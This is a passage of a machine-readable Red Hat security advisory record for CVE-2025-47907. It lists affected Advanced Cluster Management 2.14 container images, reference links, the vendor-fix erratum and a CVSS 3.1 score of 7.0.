"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
